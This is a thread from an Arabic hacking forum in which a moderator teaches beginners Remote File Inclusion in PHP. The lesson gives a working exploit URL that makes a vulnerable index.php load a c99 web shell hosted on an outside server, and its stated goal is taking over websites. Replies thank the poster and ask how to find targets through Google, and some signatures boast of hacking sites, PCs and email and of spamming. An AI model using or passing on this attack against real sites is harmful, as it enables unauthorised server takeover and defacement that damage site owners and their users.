الدرس الثالث (دينامكية عمل Remote File include)

الدرس الثالث (دينامكية عمل Remote File include)


صفحة 1 من 2 12 الأخيرةالأخيرة
النتائج 1 إلى 10 من 12

الموضوع: الدرس الثالث (دينامكية عمل Remote File include)

  1. #1
    :: إدارة :: Aljyyosh Team الصورة الرمزية ASDELY-ScOrPiOn
    تاريخ التسجيل
    Jun 2009
    الدولة
    فلسطين
    المشاركات
    2,706

    Momayz الدرس الثالث (دينامكية عمل Remote File include)

    السلام عليكم ورحمة الله وبركاته



    وصلنا والحمدلله لدرس الثالث في الدورة وهي ((دينامكية عمل Remote File include))

    كما قلت في الدرس الثاني انه هذه الثغرة شبه منقرضه فقررت ان أشرحها كمعلومة عامة للجداد في الهكر

    الثغرة اساسها خطأ في دالة include() في لغة الـPHP واللي يعرف للغة بيفهم قصدي

    هذه الدالة شغلتها انه تقترن ملف من الملفات مثلا

    كود PHP:
    www.site.com/index.php?id=main.html 
    هنا المبرمج يطلب من المتغير id الذي يحتويه ملف index.php بأن يقترن محتوى ملف main.html

    ففكر بعض الهكر في طريقة لإقتران محتوى الشل الخاص بهم ليستولوا على الموقع

    والطريقة هي ان ترفع شل على استضافة مجانية او مدفوعه بشرط ان يكون امتداد الملف txt

    مثلا هذا الشل


    كود PHP:
    http://www.c99.mobi/c99.txt 
    نريد ان نجعل index.php يقترنه عن طريق نفس المتغير id

    وطريقة كتابة الإستغلال هي


    كود PHP:
    www.site.com/index.php?id=http://www.c99.mobi/c99.txt? 
    مع وضع علامة الـ ؟ في نهاية رابط الشل

    واذا الثغرة شغاله >>> وانا لأتوقع هذا الشيء

    فسوف ترى الشل امامك واذا لم تشتغل الثغرة سترى خطأ او سيحولك الموقع الى صفحة اخرى

    الى هن ننهي الشرح
    فيديو اليوم


    اللهم صلي على سيدنا محمد ، على عَدد خَلقِك وَعلى قدر عَظَمَتك وعلى قَدرٍ محبتك له .

    سجل إختراقك الأن في Aljyyosh.org بمميزات عديده



    من مواضيعي:


    سُبْحَانَكَ اللَّهُمَّ وبَحَمْدكَ أشْهدُ أنْ لا إلهَ إلا أنْتَ أَسْتَغْفِرُكَ وأتُوبُ إِلَيْكَ

  2. #2
    هكر مبتديء الصورة الرمزية موج الأحزان
    تاريخ التسجيل
    Jul 2009
    الدولة
    ksa-الدمام
    المشاركات
    29

    افتراضي رد: الدرس الثالث (دينامكية عمل Remote File include)

    صدقت يالغالي

    هالثغرهـ

    على ايام الفراعنه
    انتظرووووني قريباً

  3. #3
    هكر مبتديء
    تاريخ التسجيل
    Jul 2009
    المشاركات
    32

    افتراضي رد: الدرس الثالث (دينامكية عمل Remote File include)

    شــــرح وافـــــــــي

    واصل من غير فاصل

  4. #4
    هكر مبتديء
    تاريخ التسجيل
    Sep 2009
    الدولة
    الأنترنت عالمي فاحذر مني
    المشاركات
    88

    افتراضي رد: الدرس الثالث (دينامكية عمل Remote File include)

    مشكور يا غالي

  5. #5
    هكر مبتديء
    تاريخ التسجيل
    Aug 2009
    المشاركات
    4

    افتراضي رد: الدرس الثالث (دينامكية عمل Remote File include)

    مشكور يا غالي

  6. #6
    هكر مبتديء
    تاريخ التسجيل
    Dec 2009
    المشاركات
    13

    افتراضي رد: الدرس الثالث (دينامكية عمل Remote File include)

    how can i find it in google

  7. #7
    هكر مبتديء
    تاريخ التسجيل
    Feb 2010
    المشاركات
    9

    افتراضي رد: الدرس الثالث (دينامكية عمل Remote File include)

    شكرا أخي والله هدا الدرس مفيد لاكن إن لم يضهر الشل بمادا تنصحنا كمبتدئين ؟؟؟

  8. #8
    هكر مجتهد الصورة الرمزية sahrawi7
    تاريخ التسجيل
    Dec 2009
    المشاركات
    444

    افتراضي رد: الدرس الثالث (دينامكية عمل Remote File include)

    مشكوووووووووووووووووووووو وووووووووووووووووور

  9. #9
    هكر مجتهد الصورة الرمزية sahrawi7
    تاريخ التسجيل
    Dec 2009
    المشاركات
    444

    افتراضي رد: الدرس الثالث (دينامكية عمل Remote File include)

    مشكوووووووووووووووووووووو وووووووووووووووووور يا غالي

  10. #10
    هكر نشيط الصورة الرمزية makaveli
    تاريخ التسجيل
    Jan 2010
    المشاركات
    192

    افتراضي رد: الدرس الثالث (دينامكية عمل Remote File include)

    مشكور يا اسد
    MaKaVeLi

    www.aljyyosh.com

    HackE WeB SiT /-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/ 80%

    HackE Pc /-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/ 75%

    HackE EmaiL /-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/ 30%

    SpameR /-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/ 70%

    Email [email protected] = conect 100%

    Email [email protected] = conect 20%

    Email [email protected] = conect 15%



صفحة 1 من 2 12 الأخيرةالأخيرة

المواضيع المتشابهه

  1. شرح استغلال ثغرات remote file include
    بواسطة BLACK.JaGuAr في المنتدى قسم الثغرات
    مشاركات: 89
    آخر مشاركة: 05-11-2012, 04:32 PM
  2. رفع الشيل عبر ثغرات remote file include
    بواسطة ASDELY-ScOrPiOn في المنتدى اختراق المواقع والسيرفرات
    مشاركات: 45
    آخر مشاركة: 03-16-2012, 09:13 PM
  3. كيفيه اكتشاف ثغرات Local File Include
    بواسطة BLACK.JaGuAr في المنتدى قسم الثغرات
    مشاركات: 41
    آخر مشاركة: 03-16-2012, 09:05 PM
  4. الدرس الخامس (دينامكية عمل ثغرة Remote Upload Vulnerability)
    بواسطة ASDELY-ScOrPiOn في المنتدى اختراق المواقع والسيرفرات
    مشاركات: 1
    آخر مشاركة: 07-22-2009, 04:24 AM

المفضلات

أذونات المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •